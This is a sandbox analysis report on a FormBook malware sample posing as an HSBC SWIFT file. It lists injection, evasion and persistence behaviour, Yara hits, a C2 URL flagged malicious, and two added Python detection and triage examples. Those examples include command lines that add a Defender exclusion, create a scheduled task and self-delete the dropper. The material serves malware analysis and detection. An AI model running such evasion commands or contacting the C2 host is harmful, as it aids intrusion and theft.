          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: explorer.exe, 0000001C.00000000.609009381.0000000005867000.00000004.00000001.sdmp | Binary or memory string: C:\Program Files\Windows Defender\MSASCui.exe

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000014.00000002.625088628.0000000003610000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000000.412407613.0000000007682000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000000.380797387.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.384803178.0000000003FCD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000014.00000002.624991985.00000000035E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.385092750.0000000004232000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000000.432842993.0000000007682000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.476496897.00000000017D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000000.381918997.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.476370956.0000000001590000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000014.00000002.625088628.0000000003610000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000000.412407613.0000000007682000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000000.380797387.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.384803178.0000000003FCD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000014.00000002.624991985.00000000035E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.385092750.0000000004232000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000000.432842993.0000000007682000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.476496897.00000000017D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000000.381918997.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.476370956.0000000001590000.00000040.00020000.sdmp, type: MEMORY
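The Yara hits in the two lists above are identified only by dump name, so a triager reading them has to decode by eye which process each hit landed in and whether the region was executable. The Python below is an added example, not part of the Joe Sandbox report, that does the decoding. The field layout it assumes for a .sdmp name is process index, stage, dump id, base address, page protection, memory type, and it reads the fifth field as a winnt.h PAGE_* value; both are assumptions about the naming scheme, consistent with the 0x40, 0x04 and 0x02 values seen throughout this report. It also parses the .unpack names and the "image, dump" pairs from the "Binary or memory string" rows to put a process name next to each index. The sample lines are copied from this report.

```python
import re

# winnt.h page-protection values. The fifth dotted field of a .sdmp name is
# read as this value (assumption about the Joe Sandbox naming scheme).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

# <process index>.<stage>.<dump id>.<base address>.<protection>.<type>.sdmp
SDMP_RE = re.compile(
    r"(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<mtype>[0-9A-Fa-f]{8})\.sdmp"
)
# <process index>.<stage>.<image name>.<base address>.<dump id>[.raw].unpack
UNPACK_RE = re.compile(
    r"(?P<proc>\d+)\.(?P<stage>\d+)\.(?P<image>.+?)\.(?P<base>[0-9A-Fa-f]+)\."
    r"(?P<dump_id>\d+)(?P<raw>\.raw)?\.unpack\b"
)
# "<image>, <sdmp name>" pairs as they appear in the "Binary or memory string" rows
NAME_RE = re.compile(r"(?P<image>[\w.\-]+\.exe), (?P<proc>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.\d+\.")


def parse_sdmp(text):
    """Decode the first .sdmp dump name found in text; None if there is none."""
    m = SDMP_RE.search(text)
    if m is None:
        return None
    protect = int(m["protect"], 16)
    return {
        "process": int(m["proc"], 16),
        "stage": int(m["stage"], 16),
        "base": int(m["base"], 16),
        "protect": PAGE_PROTECT.get(protect & 0xFF, hex(protect)),
        # any PAGE_EXECUTE* bit set: the region held code, not only data
        "executable": bool(protect & 0xF0),
    }


def parse_unpack(text):
    """Decode the first .unpack (extracted PE) name found in text; None if absent."""
    m = UNPACK_RE.search(text)
    if m is None:
        return None
    return {
        "process": int(m["proc"]),
        "stage": int(m["stage"]),
        "image": m["image"],
        "base": int(m["base"], 16),
        "raw": m["raw"] is not None,
    }


def process_names(lines):
    """Map process index -> image name from '<image>, <sdmp>' pairs and .unpack names."""
    names = {}
    for line in lines:
        for m in NAME_RE.finditer(line):
            names[int(m["proc"], 16)] = m["image"]
        u = parse_unpack(line)
        if u is not None:
            names[u["process"]] = u["image"]
    return names


def summarize(lines):
    """Per process index: how many dumps carry a hit, and the bases of the executable ones."""
    acc = {}
    for line in lines:
        rec = parse_sdmp(line)
        if rec is None:
            continue
        entry = acc.setdefault(rec["process"], {"total": 0, "executable_bases": set()})
        entry["total"] += 1
        if rec["executable"]:
            entry["executable_bases"].add(rec["base"])
    return {p: {"total": e["total"], "executable_bases": sorted(e["executable_bases"])}
            for p, e in acc.items()}


# The twelve MEMORY hits listed under "Yara detected FormBook" in this report.
YARA_LINES = [
    "File source: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, type: MEMORY",
    "File source: 00000014.00000002.625088628.0000000003610000.00000004.00000001.sdmp, type: MEMORY",
    "File source: 0000000A.00000000.412407613.0000000007682000.00000040.00020000.sdmp, type: MEMORY",
    "File source: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, type: MEMORY",
    "File source: 00000008.00000000.380797387.0000000000400000.00000040.00000001.sdmp, type: MEMORY",
    "File source: 00000000.00000002.384803178.0000000003FCD000.00000004.00000001.sdmp, type: MEMORY",
    "File source: 00000014.00000002.624991985.00000000035E0000.00000040.00020000.sdmp, type: MEMORY",
    "File source: 00000000.00000002.385092750.0000000004232000.00000004.00000001.sdmp, type: MEMORY",
    "File source: 0000000A.00000000.432842993.0000000007682000.00000040.00020000.sdmp, type: MEMORY",
    "File source: 00000008.00000002.476496897.00000000017D0000.00000040.00020000.sdmp, type: MEMORY",
    "File source: 00000008.00000000.381918997.0000000000400000.00000040.00000001.sdmp, type: MEMORY",
    "File source: 00000008.00000002.476370956.0000000001590000.00000040.00020000.sdmp, type: MEMORY",
]
# Image/dump pairs copied from this report's "Binary or memory string" rows and
# one of its .unpack names: enough to name every process index that carries a hit.
NAME_LINES = [
    "HSBC_SWIFT-20-11-2021.exe, 00000000.00000002.384226199.0000000002FC1000.00000004.00000001.sdmp",
    "explorer.exe, 0000000A.00000000.424397974.0000000000EE0000.00000002.00020000.sdmp",
    "msdt.exe, 00000014.00000002.625333622.0000000003A30000.00000002.00020000.sdmp",
    "explorer.exe, 0000001C.00000003.535032917.0000000004C4E000.00000004.00000001.sdmp",
    "8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.unpack",
]

if __name__ == "__main__":
    names = process_names(NAME_LINES)
    for proc, info in sorted(summarize(YARA_LINES).items()):
        bases = ", ".join(hex(b) for b in info["executable_bases"]) or "-"
        print(f"{proc:>3} {names.get(proc, '?'):<28} hits={info['total']} executable regions: {bases}")
```

Run as a script it lists, per process index, the hit count and the executable regions: index 8 (the second HSBC_SWIFT-20-11-2021.exe, the hollowed copy) carries hits at its image base 0x400000 and in two RWX heap regions, index 20 (msdt.exe) at two RWX regions, index 10 (the injected explorer.exe) at 0x7682000, while the hits in index 0 (the original dropper) sit only in read/write data, consistent with the payload being carried there before it is written into the child.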

          Mitre Att&ck Matrix

          Techniques per tactic; bracketed digits are the matrix's per-technique signature-count superscripts.

          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
          Execution: Command and Scripting Interpreter [2]; Scheduled Task/Job [1]; Shared Modules [1]; At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
          Persistence: Scheduled Task/Job [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
          Privilege Escalation: Process Injection [412]; Scheduled Task/Job [1]; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
          Defense Evasion: Masquerading [1]; Disable or Modify Tools [11]; Virtualization/Sandbox Evasion [41]; Process Injection [412]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [3]; Software Packing [13]; File Deletion [1]
          Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
          Discovery: Query Registry [1]; Security Software Discovery [241]; Process Discovery [2]; Virtualization/Sandbox Evasion [41]; Application Window Discovery [1]; File and Directory Discovery [1]; System Information Discovery [112]; Network Service Scanning
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
          Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
          Command and Control: Encrypted Channel [1]; Application Layer Protocol [1]; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

          Behavior Graph

          Behavior Graph ID: 528767; Sample: HSBC_SWIFT-20-11-2021.exe; Start date: 25/11/2021; Architecture: WINDOWS; Score: 100

          Signatures on the sample node: Found malware configuration; Malicious sample detected (through community Yara rule); Yara detected AntiVM3; 6 other signatures

          Process tree reconstructed from the behavior graph:

          HSBC_SWIFT-20-11-2021.exe (started)
              dropped: C:\Users\user\AppData\...\RdffGefdbLSx.exe (PE32)
              dropped: C:\Users\user\AppData\Local\...\tmp4EB8.tmp (XML)
              signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender; Tries to detect virtualization through RDTSC time measurements
              HSBC_SWIFT-20-11-2021.exe (started)
                  signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                  explorer.exe (injected)
                      msdt.exe (started)
                          signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                          cmd.exe (started)
                              conhost.exe (started)
                          explorer.exe (started)
              powershell.exe (started)
                  conhost.exe (started)
              powershell.exe (started)
                  conhost.exe (started)
              schtasks.exe (started)
                  conhost.exe (started)
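The chain in the behavior graph is what a detection engineer would want to catch before the payload reaches the C2: the dropper creates a scheduled task from an XML file in the user's Temp directory, runs PowerShell to add a Defender exclusion, spawns a second copy of itself to hollow, and, via the injected explorer.exe and msdt.exe, has cmd.exe delete the original file. The Python below is an added example, not code from the report or from Joe Sandbox, that runs those four checks over process-creation events. The events are constructed for the example: the PIDs, the command lines, the SysWOW64 paths for schtasks.exe, msdt.exe and cmd.exe, the task name and the Temp file name are made up; only the image names and the parent/child shape come from the graph.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str


def image_name(path):
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, pid, parent image name) for each loader/FormBook behaviour seen."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = image_name(e.image)
        cl = e.cmdline.lower()
        parent = by_pid.get(e.ppid)
        parent_name = image_name(parent.image) if parent else ""

        # 1. schtasks creating a task from an XML file under the user's Temp
        if name == "schtasks.exe" and "/create" in cl and "/xml" in cl \
                and "\\appdata\\local\\temp\\" in cl:
            findings.append(("task_from_appdata_temp", e.pid, parent_name))

        # 2. PowerShell adding a Defender path exclusion
        if name == "powershell.exe" and "add-mppreference" in cl \
                and "-exclusionpath" in cl:
            findings.append(("defender_exclusion", e.pid, parent_name))

        # 3. a binary in a user-writable location starting a second copy of
        #    itself: the hollowing target before explorer.exe is injected
        if parent is not None and e.image.lower() == parent.image.lower() \
                and "\\users\\" in e.image.lower():
            findings.append(("self_spawn_hollowing_candidate", e.pid, parent_name))

        # 4. cmd.exe deleting a user-writable .exe; the parent name tells the
        #    analyst whether a system binary such as msdt.exe launched it
        if name == "cmd.exe" and re.search(r'\bdel\s+"?([a-z]:\\users\\[^"\s]+\.exe)', cl):
            findings.append(("self_delete_via_cmd", e.pid, parent_name))
    return findings


# Constructed events modelled on the graph's chain (values are made up; see above).
SAMPLE_EVENTS = [
    ProcEvent(800, 600, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1000, 800, r"C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe",
              r'"C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe"'),
    ProcEvent(1010, 1000, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming"'),
    ProcEvent(1020, 1000, r"C:\Windows\SysWOW64\schtasks.exe",
              r'schtasks.exe /Create /TN "Sample" /XML "C:\Users\user\AppData\Local\Temp\tmpA1B2.tmp"'),
    ProcEvent(1030, 1000, r"C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe",
              r'"C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe"'),
    # explorer.exe (pid 800) is injected, not created, so there is no event for
    # it; the injected code starts msdt.exe, which starts the deleting cmd.exe
    ProcEvent(1050, 800, r"C:\Windows\SysWOW64\msdt.exe", "msdt.exe"),
    ProcEvent(1060, 1050, r"C:\Windows\SysWOW64\cmd.exe",
              r'cmd.exe /c del "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe"'),
]

if __name__ == "__main__":
    for rule, pid, parent in detect(SAMPLE_EVENTS):
        print(f"{rule:<32} pid={pid} parent={parent}")
```

Checks 1 and 2 correspond to the two Sigma hits on the sample, check 3 to the process-hollowing signatures on the second HSBC_SWIFT-20-11-2021.exe node, and check 4 to "Self deletion via cmd delete" on msdt.exe. Check 3 deliberately does not fire for a system binary that re-spawns itself, and check 4 reports the parent rather than filtering on it, so that an analyst sees the unusual msdt.exe lineage instead of a rule that hard-codes one injection host.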


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          8.0.HSBC_SWIFT-20-11-2021.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          www.164661.com/ntfs/ | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          www.164661.com/ntfs/ | true | Avira URL Cloud: safe | low

          URLs from Memory and Binaries

              Name | Source | Malicious | Antivirus Detection | Reputation
              http://www.autoitscript.com/autoit3/J | explorer.exe, 0000000A.00000000.405790270.000000000095C000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.423799260.000000000095C000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.385812561.000000000095C000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.455497902.000000000095C000.00000004.00000020.sdmp | false | | high
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | HSBC_SWIFT-20-11-2021.exe, 00000000.00000002.384226199.0000000002FC1000.00000004.00000001.sdmp | false | | high

              Contacted IPs

              No contacted IP infos

              General Information

              Joe Sandbox Version:34.0.0 Boulder Opal
              Analysis ID:528767
              Start date:25.11.2021
              Start time:18:47:51
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 12m 42s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:HSBC_SWIFT-20-11-2021.exe
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of new started processes analysed:34
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:1
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@17/12@0/0
              EGA Information:Failed
              HDC Information:
              • Successful, ratio: 20% (good quality ratio 18.2%)
              • Quality average: 73.8%
              • Quality standard deviation: 31%
              HCA Information:
              • Successful, ratio: 98%
              • Number of executed functions: 125
              • Number of non-executed functions: 160
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
